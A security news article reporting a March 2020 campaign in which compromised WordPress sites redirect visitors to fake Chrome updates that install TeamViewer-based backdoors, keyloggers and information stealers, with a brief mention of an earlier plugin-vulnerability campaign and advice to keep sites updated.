Exploiting compromised WordPress sites is no news in the field of computer security.
However, some campaigns seem to be more severe than others, and so is this one. Hacked corporate websites and news blogs running on WordPress are currently being exploited by attackers in their attempt to deliver backdoor malware.
This type of malware opens up the door to further malicious payloads, including information stealers, various Trojans, and keylogging software. To carry out these attacks, the threat actors are using fake Chrome updates.
Hacked WordPress Sites – a March 2020 Malicious Campaign
The initial stage of this malicious campaign involves gaining admin access to the targeted WordPress sites and blogs. After it is accomplished, the threat actors inject malicious JavaScript code which is then redirecting users to the fake Chrome update.
Instead of getting an update, the potential victims could download malicious installers that give control over their computers through a TeamViewer installation. Once TeamViewer is installed onto the compromised system, two password-protected SFX archives loaded with malicious files will be unarchived. These contain the necessary files to open the fake update page and enable remote connections. A specific script to bypass Windows built-in protections is also activated.
What malware is downloaded onto compromised systems?
- The X-Key Keylogger;
- The Predator and The Thief information stealers;
- A Trojan for remote control over the RDP protocol.
Who is behind these campaigns?
Security researchers at Dr. Web believe that these are the same threat actors that were previously involved in spreading a fake installer of a popular VSDC video editor via its official website and the CNET download platform.
A previous malicious campaign, uncovered in August 2019, leveraged WordPress plugins to hack into websites. A series of popular WordPress plugins were found to contain a security weakness, thus allowing hackers to take over control of targeted sites to infect them with malware.
The list of exploited WordPress plugins included Simple 301 Redirects – Addon – Bulk Uploader and others developed by NicDark. To avoid any such campaigns, WordPress site owners should sustain a strict update hygiene where everything is kept timely upgraded and in order, WordPress itself as well as any additionally installed software.
Milena Dimitrova
An inspired writer and content manager who has been with SensorsTechForum since the project started. A professional with 10+ years of experience in creating engaging content. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim
Follow Me: